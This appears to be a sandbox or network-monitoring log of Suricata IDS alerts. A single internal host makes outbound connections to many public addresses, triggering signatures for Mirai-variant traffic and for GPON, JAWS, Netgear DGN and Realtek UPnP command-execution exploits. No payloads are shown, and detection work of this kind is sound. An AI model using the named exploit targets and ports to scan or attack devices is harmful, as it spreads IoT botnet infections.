                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51398 -> 210.181.40.142:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:43226 -> 206.130.7.22:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:40630 -> 9.109.75.127:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53188 -> 118.35.168.154:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41280 -> 215.50.246.23:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37392 -> 207.198.77.45:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39344 -> 205.19.156.154:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41916 -> 126.179.23.111:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58674 -> 163.115.127.191:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37292 -> 149.210.29.201:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:36522 -> 91.41.16.118:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37956 -> 90.24.179.163:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59066 -> 67.156.164.38:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54490 -> 172.27.14.53:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48332 -> 172.201.78.230:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36788 -> 81.14.183.229:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48506 -> 87.186.17.243:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39330 -> 37.106.97.86:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39330 -> 37.106.97.86:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56468 -> 133.86.189.70:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40562 -> 53.197.184.64:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37634 -> 75.88.145.147:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44310 -> 191.118.66.148:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40856 -> 23.210.109.40:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42212 -> 53.169.246.148:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50746 -> 117.194.49.127:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:60202 -> 169.70.235.203:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59380 -> 212.148.153.192:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43934 -> 136.165.68.160:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34732 -> 198.246.28.145:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33368 -> 150.143.19.210:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48354 -> 162.154.175.138:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34504 -> 203.246.201.178:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58762 -> 110.215.176.196:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52460 -> 199.190.42.216:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34484 -> 81.152.153.104:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34484 -> 81.152.153.104:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48354 -> 162.154.175.138:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:45430 -> 1.146.114.34:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35404 -> 31.125.159.69:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52956 -> 34.155.65.192:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:42120 -> 92.244.233.206:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35700 -> 115.248.197.146:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41488 -> 28.130.196.141:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33518 -> 64.246.130.65:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53262 -> 137.77.114.156:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35642 -> 59.92.247.206:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46760 -> 103.136.18.241:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39800 -> 205.55.79.236:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54614 -> 6.130.70.88:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53186 -> 38.61.43.59:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53186 -> 38.61.43.59:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35810 -> 19.207.169.63:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54536 -> 48.84.204.236:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53700 -> 129.114.47.187:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:33420 -> 209.95.98.5:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35442 -> 145.145.175.50:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55614 -> 75.28.78.167:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52860 -> 29.92.227.30:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52874 -> 115.176.251.133:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52860 -> 29.92.227.30:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53702 -> 120.95.235.71:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56244 -> 125.138.41.164:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40464 -> 174.191.244.5:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56244 -> 125.138.41.164:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:59620 -> 104.228.111.14:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56000 -> 156.9.96.43:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36728 -> 60.31.41.49:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32868 -> 217.149.6.59:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59740 -> 56.225.44.220:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38914 -> 179.129.124.12:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56222 -> 154.183.15.240:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:50832 -> 113.213.180.153:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33518 -> 64.246.130.65:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56222 -> 154.183.15.240:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53116 -> 105.183.55.212:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56064 -> 131.11.250.52:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60738 -> 171.18.70.194:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49254 -> 21.58.30.238:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53802 -> 45.210.95.218:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39954 -> 76.56.4.87:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35390 -> 51.78.208.9:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46104 -> 167.95.195.48:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57392 -> 168.22.178.161:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60010 -> 198.111.45.203:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53960 -> 117.138.201.233:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50222 -> 189.118.208.52:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32868 -> 217.149.6.59:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56766 -> 148.104.170.209:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40490 -> 48.76.49.73:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34116 -> 174.193.104.217:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43712 -> 220.37.202.8:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43694 -> 155.188.212.116:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46048 -> 206.101.86.38:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46800 -> 116.50.214.170:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36152 -> 175.33.232.251:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43780 -> 45.7.188.235:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36152 -> 175.33.232.251:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37498 -> 50.241.123.12:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47912 -> 107.123.240.5:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59530 -> 129.247.169.177:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35286 -> 75.198.60.36:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44902 -> 38.94.214.104:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44878 -> 47.227.87.189:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34660 -> 175.193.203.48:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41612 -> 43.51.149.142:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34398 -> 222.180.230.186:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35982 -> 153.158.173.169:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58478 -> 170.154.175.226:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41612 -> 43.51.149.142:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54992 -> 34.251.227.117:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48472 -> 72.196.245.40:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:60616 -> 204.174.148.48:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57702 -> 207.208.138.25:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59644 -> 131.224.165.201:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38126 -> 113.43.66.2:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57702 -> 207.208.138.25:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43264 -> 217.185.174.89:5555
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33314 -> 153.28.27.68:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37332 -> 64.90.223.116:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53016 -> 47.219.98.220:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59644 -> 131.224.165.201:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47966 -> 189.212.174.222:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58704 -> 134.145.254.175:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38470 -> 94.38.108.174:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55826 -> 136.244.168.161:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57576 -> 141.74.31.86:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47162 -> 69.214.87.241:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43906 -> 5.176.45.173:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53152 -> 80.171.126.29:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52260 -> 141.228.135.142:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43052 -> 97.218.108.192:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40728 -> 88.238.152.125:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44018 -> 47.80.200.95:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:46460 -> 131.244.225.102:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47070 -> 30.145.58.15:52869
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:60044 -> 93.98.197.179:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43570 -> 104.181.12.16:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33978 -> 89.81.235.161:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42762 -> 115.67.171.112:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33468 -> 168.11.66.49:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33468 -> 168.11.66.49:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51516 -> 123.85.144.247:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48882 -> 93.215.216.106:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57188 -> 90.16.121.147:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45250 -> 45.22.47.103:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:52410 -> 8.202.67.229:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48968 -> 152.230.216.20:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49966 -> 138.136.138.165:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:58554 -> 160.49.80.179:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54498 -> 84.44.230.193:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58080 -> 221.50.187.178:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37148 -> 93.127.201.166:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54498 -> 84.44.230.193:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:47362 -> 93.52.53.0:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52688 -> 137.242.182.194:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45944 -> 156.233.225.157:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59710 -> 176.129.63.174:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55766 -> 27.155.160.77:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60546 -> 191.152.135.201:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47872 -> 157.65.160.237:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42104 -> 195.103.106.246:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54622 -> 65.241.114.10:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42104 -> 195.103.106.246:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:60702 -> 96.114.30.207:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57636 -> 19.148.27.162:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34624 -> 218.216.106.153:49152
